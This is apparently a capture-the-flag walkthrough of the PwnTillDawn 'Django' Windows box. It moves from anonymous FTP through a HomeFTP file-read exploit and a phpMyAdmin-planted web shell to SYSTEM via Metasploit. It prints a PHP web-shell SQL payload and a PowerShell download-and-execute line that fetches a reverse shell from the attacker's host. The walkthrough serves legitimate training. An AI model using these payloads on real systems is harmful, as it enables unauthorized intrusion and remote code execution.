Today we are working on Django, a Windows box from https://online.pwntilldawn.com. Thanks to https://www.wizlynxgroup.com/ for creating this box. I’ve completed the other Windows boxes from this site, but this one was the first one that compelled me to do a writeup. Not that is was exactly difficult, but in my opinion the number of steps to get to System and the number of rabbit-holes make it more involved than the other Easy boxes. Let’s get started.
Initial Enumeration
Our nmap scan reveals a number of open ports to enumerate.
A deeper scan shows anonymous ftp access, so let’s start there. Run the scan for yourself to see details for the remainder of the ports.
Connecting to ftp, we find our first flag and a few other files that were no help.
Home FTP Exploit
After getting the flag from anonymous FTP, I moved on to enumerating other services on the box. This turned out to be a mistake that cost me several hours of investigating rabbit-holes. Only after I had seemingly exhausted my options did I come back to investigating Home FTP, where I found this exploit available:
Download the python script from exploit-db and modify the host to Django’s IP address.
I tested the script by reading some Windows system files, and also verified I could not read more privileged files like the SAM hashes. From our nmap scans and http enumeration, we know this box is running Xampp. A little online research of Xampp reveals that the software stores credentials in a file it helpfully names passwords.txt. Let’s try to read it with our HomeFTP exploit. First define the file to be read in the python script.
Then run the exploit.
PHPMyAdmin
Passwords.txt gives us creds to log into phpmyadmin, which can be used to manage MySQL databases. There is a link to phpmyadmin from the Xampp homepage (https, the http version doesn’t let us log on), or just navigate your browser to: https://django/phpmyadmin/
Once we log on, click on the databases tab and we find our next flag
I spent some time clicking through the various screens on phpmyadmin trying to find a way to upload a shell, but I didn’t have any luck. However, with a bit of time on Google I found this incredibly helpful site.
https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
This site in general is super-helpful and I’ve used a number of their writeups in past CTF’s. Per the writeup, we navigate to the SQL tab, paste in the following query and click Go.
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
We get confirmation our query was submitted, and now can we use our newly created php page for command execution. For example:
Foothold
From here I diverged from the hackingarticles.in solution a bit because I wanted to get a non-meterpreter shell using a technique I was more familiar with. Ultimately, as you’ll see, I ended up back with Metasploit, but at least I gave a command shell a try first. :-P
The shell I used was one of the options from the Nishang Powershell script, Invoke-PowerShellTcpOneLine.ps1. I learned about these scripts from IppSec so check out his videos for more info. My version of the one-liner looks like:
Make sure to launch both SimpleHTTPServer and a netcat listener on your Kali box, then upload the shell using the command execution backdoor. Navigate in your browser to:
https://django/backdoor.php?cmd=powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.66.66.194/shell.ps1')"
Interestingly, a few times I had to cancel the request and then wait a few more seconds before the upload and reverse shell executed.
User
If we go up one folder we find the third flag.
If we navigate to the Users folder and check user chuck.norris we get the fourth flag:
I feel must briefly object to this user account. Certainly Chuck Norris should have system privileges to this box, but alas he does not. If we are going to get system, we’ll need to keep working.
Privesc
I attempted some manual privesc enumeration, but suffice to say I didn’t get anywhere. I also checked the obvious applications (Xampp, Splunk, etc.) for local privesc vulnerabilities, but also came up empty. The version of .NET running on this box is 3.x, so WinPEAS is also not an option. I ultimately decided to migrate my command shell to a Meterpreter shell in order to run suggester, something I’ve been doing a lot lately for Windows privesc. To start with, we create the payload with msfvenom.
Upload the payload using our existing shell.
In Metasploit, set up exploit/multi/handler with the IP of our Kali box and the payload we created.
Get Metasploit listening and run the payload executable.
We get a Meterpreter session.
Background the session and run suggester, which gives us some options.
The third options executes. Details on CVE-2019–1458 from my research are minimal, but the vulnerability is listed as, “An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’.”
We have gotten SYSTEM on the box. Thanks for reading!
